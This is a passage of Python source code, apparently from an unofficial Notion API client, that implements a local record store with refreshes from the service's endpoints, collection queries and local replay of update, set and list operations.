"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": 100000,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
filter=[],
filter_operator="and",
sort=[],
calendar_by="",
group_by="",
):
# convert singletons into lists if needed
#if isinstance(aggregate, dict):
#aggregate = [aggregate]
#if isinstance(filter, dict):
#filter = [filter]
#if isinstance(sort, dict):
#sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"searchQuery": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"filter": filter,
"filter_operator": filter_operator,
"sort": sort,
},
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
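

# Usage sketch (hypothetical ids) of mirroring a server operation locally
# without waiting for a refresh: insert block "xyz789" right after "def456"
# in the cached block's "content" list, as the server would on the next sync.
#
#   store.run_local_operation(
#       table="block", id="abc123",
#       path=["content"], command="listAfter",
#       args={"after": "def456", "id": "xyz789"},
#   )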
|